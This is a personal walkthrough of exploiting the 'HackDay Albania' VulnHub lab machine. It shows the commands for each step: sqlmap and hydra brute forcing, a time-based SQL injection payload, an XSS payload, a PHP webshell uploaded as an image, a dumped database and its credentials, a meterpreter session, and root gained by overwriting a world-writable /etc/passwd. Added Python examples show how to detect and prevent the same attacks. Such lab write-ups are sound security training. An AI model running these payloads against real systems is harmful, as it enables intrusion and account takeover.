HackDay VM Writeup

Please pardon the informality in this post 😛

First I did an nmap scan on all ports.

Had 22 and 8008 open.

Browsed to 8008 and had a meme on the front page.

Ran Nikto and found an interesting robots.txt.

Started plugging and chugging until this one gave

Navigated to vulnbank/

At this point it’s been 5 minutes and I’ve made a lot of progress.

I threw a single quote into the username field and got a SQL error back, so I ran sqlmap.

Sqlmap seemed to be able to inject into the username field, however, I wasn’t able to get any information out of it… I should probably get better at SQL injection.

sqlmap --url http://192.168.1.235:8008/unisxcudkqjydw/vulnbank/client/login.php --data='username=admin'

Next I tried a hydra brute force with the username admin and the rockyou password list.

hydra 192.168.1.235 http-form-post "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid" -l admin -P rockyou.txt -t 32 -w 30 -o hydra_output.txt -s 8008
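From the defender's side, a burst like the one hydra produces against login.php is easy to spot in the web server's access log. The script below is an added example, not part of this writeup or the VM: it parses Apache combined-format lines and flags any source that POSTs to the login form more than a threshold number of times inside a sliding window. The log lines are constructed here to model the burst; the path is the one from this writeup, the IPs and timestamps are made up. Note that because the form answers failed logins with a 200 page containing "Invalid" (which is what the hydra failure string above keys on), the detector counts POSTs rather than relying on a 401/403 status.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/unisxcudkqjydw/vulnbank/client/login.php"  # path from the writeup


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def detect_login_bursts(lines, login_path, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: peak_count} for sources whose POSTs to login_path exceeded
    `threshold` inside any sliding window of length `window`.
    Status codes are ignored on purpose: this form returns 200 on failure."""
    recent = defaultdict(deque)  # ip -> timestamps of recent POSTs
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or not ev["path"].endswith(login_path):
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:  # drop events older than the window
            q.popleft()
        if len(q) > threshold:
            flagged[ev["ip"]] = max(flagged.get(ev["ip"], 0), len(q))
    return flagged


def constructed_log():
    """Constructed sample log (not captured from the VM): one normal user plus
    one source firing 40 POSTs in 20 seconds, then 3 more an hour later."""
    base = datetime(2018, 3, 12, 10, 0, 0, tzinfo=timezone.utc)

    def fmt(ip, method, ts):
        return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {LOGIN_PATH} HTTP/1.1" 200 812'

    lines = [fmt("10.0.0.5", "GET", base), fmt("10.0.0.5", "POST", base + timedelta(seconds=5))]
    lines += [fmt("10.0.0.9", "POST", base + timedelta(seconds=i // 2)) for i in range(40)]
    lines += [fmt("10.0.0.9", "POST", base + timedelta(hours=1, seconds=i)) for i in range(3)]
    return lines


if __name__ == "__main__":
    for ip, peak in detect_login_bursts(constructed_log(), "login.php").items():
        print(f"possible credential brute force from {ip}: {peak} POSTs within 60s")
```

The three POSTs an hour later are deliberately below the threshold, which shows the window actually expires old events; lowering `threshold` or widening `window` trades false positives for catching slower guessing.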

After struggling with both these tools for a while I decided to run dirb and found two directories. One contained two images, one being this meme.

The other directory found was /upload/, which yields a white screen… which I have no idea what to do with…

At this point I’m kinda stuck. Not knowing what to do, I went back to sqlmap. It had a generated payload that started with (username=1' -- ). I plugged that in and didn’t get an error… So I started throwing random stuff.

Got stuck and looked at a walkthrough right here. This was the syntax I needed. Which I didn’t even know.

username=1' RLIKE SLEEP(5) --

[Screenshot: AfterLogin.png]

I see the upload function and immediately think webshell.

Plugged <script>alert(1)</script> into the problem field and got XSS. Tried uploading my PHP webshell but only image files are allowed. Uploaded the webshell as an image and now I’m going to try to rename it.

Just a heads up: there is no way to remove the XSS, so now it’s really annoying.

Changed the extension to .jpg and navigated to it. And it still executed… Not exactly sure why.

[Screenshot: Got Shell.png]
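The upload form above checked the file name and nothing else, which is why a PHP file with a .jpg extension got through and still ran. The following is an added example of the server-side checks that close that gap; it is my own illustration, not code from this VM or its author, and the sample files are constructed inline. The checks are: identify the type from magic bytes instead of the client's name, require the claimed extension to agree with the detected type, refuse any "image" that carries script markers (a polyglot), and store the file under a random server-chosen name so the client never controls the path.

```python
import os
import re
import secrets

# Allow-list of image types: extension -> magic-byte prefixes the file must start with.
IMAGE_MAGIC = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}

# Script markers that have no business inside an image. A server that hands uploads
# to the PHP handler regardless of extension would execute these, so reject them.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script\b|<%", re.IGNORECASE)


def detect_image_type(data):
    """Return the extension whose magic bytes match the content, or None."""
    for ext, magics in IMAGE_MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return ext
    return None


def validate_image_upload(client_filename, data, max_bytes=2 * 1024 * 1024):
    """Return (accepted, reason, stored_name).
    stored_name is a random name with the *detected* extension; the client's
    file name is only used to check that it agrees with the content."""
    if not data or len(data) > max_bytes:
        return False, "empty or too large", None
    claimed = os.path.splitext(client_filename)[1].lower()
    detected = detect_image_type(data)
    if detected is None:
        return False, "content is not a recognised image", None
    if claimed not in IMAGE_MAGIC or IMAGE_MAGIC[claimed] != IMAGE_MAGIC[detected]:
        return False, f"claimed extension {claimed!r} does not match content", None
    if SCRIPT_MARKERS.search(data):
        return False, "script markers embedded in image", None
    return True, "ok", secrets.token_hex(16) + detected


# Constructed samples (not the VM's files):
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64          # minimal PNG-looking blob
SAMPLE_RENAMED_SCRIPT = b"<?php echo 'not an image'; ?>"  # script saved as .jpg
SAMPLE_POLYGLOT = b"GIF89a" + b"\x00" * 16 + b"<?php echo 'hi'; ?>"  # valid header, script tail


if __name__ == "__main__":
    for name, blob in [("meme.png", SAMPLE_PNG), ("shell.jpg", SAMPLE_RENAMED_SCRIPT),
                       ("meme.gif", SAMPLE_POLYGLOT), ("meme.jpg", SAMPLE_PNG)]:
        ok, reason, stored = validate_image_upload(name, blob)
        print(f"{name:10} -> {'accept' if ok else 'reject'}: {reason} {stored or ''}")
```

Content checks alone are not the whole fix: the upload directory should also be served with script execution disabled (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a file the validator misjudges is returned as bytes rather than run.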

I looked around, no easy cronjobs or noticeable files. So I decided to see if there are any hardcoded passwords in the website that we were trying to get SQL injection in.

Sure enough, we found some database passwords:

[Screenshot: database info.png]

$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";

I tried to start using mysql but I couldn’t because my shell wasn’t good enough.

So I had to pass the queries over the command line with these commands:

mysql -u root -p -e 'Show Tables' bank_database
mysql -u root -p -e 'Select * From klienti' bank_database

Got this back:

ID emer mbiemer bilanci username password
1 Charles D. Hobson 25000 hobson Charles123
Fischer 120000 jeff jeff321

Tried the jeff user but it doesn’t look like he has anything that Charles didn’t.

Kinda got stuck again. Thought I could do something after finding those creds but couldn’t find anything. So I started trying to find ways to privilege escalate. First things first: check /etc/passwd.

taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash

This looks like the user I probably need to get to.

Decided to transfer a unix privesc-check script using apache and wget.

However, it needed strings to run so no luck there. No idea how a Linux system doesn’t have strings…

Anyway! I ran this one-liner to find world-writable files.

find / -xdev -perm -0002 -type f -print 2>/dev/null

/etc/passwd

/tmp/privs

/tmp/priv.sh

The two files in /tmp were my uploaded privesc check script.

It turns out I can write to /etc/passwd. I’m not sure this is a lead, but it’s worth looking into.

[Screenshot: EtcPasswd.png]

However, since my shell is so bad, I can’t edit it with nano or vi. So I gotta figure out how to upgrade it.

Finally figured out how to generate a msfpayload.

Uploaded it to the target using my apache server and then got a meterpreter session.

[Screenshot: Meterp.png]

Here you can see all my failed payload generations!

So now I needed to add a password to /etc/passwd so I can su. After trying a bunch of things I couldn’t get it, so I looked at the walkthrough by G0blin: https://g0blin.co.uk/albania-vulnhub-writeup/

openssl passwd -1 -salt salt letmein

I couldn’t seem to use any text editor, so I created the file on my desktop and uploaded it. And then:

cat passwd > /etc/passwd

Now I have root.
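The root path here rests on two misconfigurations that a host audit catches directly: /etc/passwd being writable by everyone (the find one-liner above found it), and a password hash being accepted straight from /etc/passwd instead of /etc/shadow. The script below is an added example written for this writeup, not the VM's own tooling: it parses passwd-format text and flags entries with a hash or empty password field, extra uid-0 accounts and duplicate names, and it checks the mode and owner of a critical file. The passwd content is constructed; the hash in the last line is a placeholder, not a real crypt output, and the taviso line is the one quoted earlier in the post.

```python
import os
import stat
import tempfile

# Constructed /etc/passwd content (not the VM's file). The last line models the
# kind of entry that gets appended when the file is world-writable: a crypt-style
# hash in the password field (a shadowed system has only "x" there) and uid/gid 0.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
backdoor:$1$salt$PLACEHOLDERHASHnotreal:0:0::/root:/bin/bash
"""

SHADOWED = {"x", "*", "!", "!!"}  # values that mean "look in /etc/shadow" or "locked"


def audit_passwd_content(text):
    """Return a list of (line_no, user, finding) for suspicious passwd entries."""
    findings = []
    seen = set()
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, line[:20], "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid, gid, gecos, home, shell = fields
        if pw == "":
            findings.append((n, user, "empty password field (no password required)"))
        elif pw not in SHADOWED:
            findings.append((n, user, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and user != "root":
            findings.append((n, user, "uid 0 account other than root"))
        if user in seen:
            findings.append((n, user, "duplicate username"))
        seen.add(user)
    return findings


def audit_file_mode(path):
    """Return (path, finding) pairs for a critical file that should be root-owned
    and writable by root only, e.g. /etc/passwd."""
    st = os.stat(path)
    out = []
    if st.st_mode & stat.S_IWOTH:
        out.append((path, "world-writable"))
    if st.st_mode & stat.S_IWGRP:
        out.append((path, "group-writable"))
    if st.st_uid != 0:
        out.append((path, f"owned by uid {st.st_uid}, not root"))
    return out


def demo_world_writable_check():
    """Create a temp file with mode 0666 and return the finding strings for it."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o666)
        return [finding for _, finding in audit_file_mode(path)]
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for n, user, finding in audit_passwd_content(SAMPLE_PASSWD):
        print(f"line {n} ({user}): {finding}")
    for path, finding in audit_file_mode("/etc/passwd"):
        print(f"{path}: {finding}")
```

Run against the real file, `audit_passwd_content(open("/etc/passwd").read())` together with `audit_file_mode("/etc/passwd")` is a cheap check to put in a host baseline; on a correctly configured system both return empty lists.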
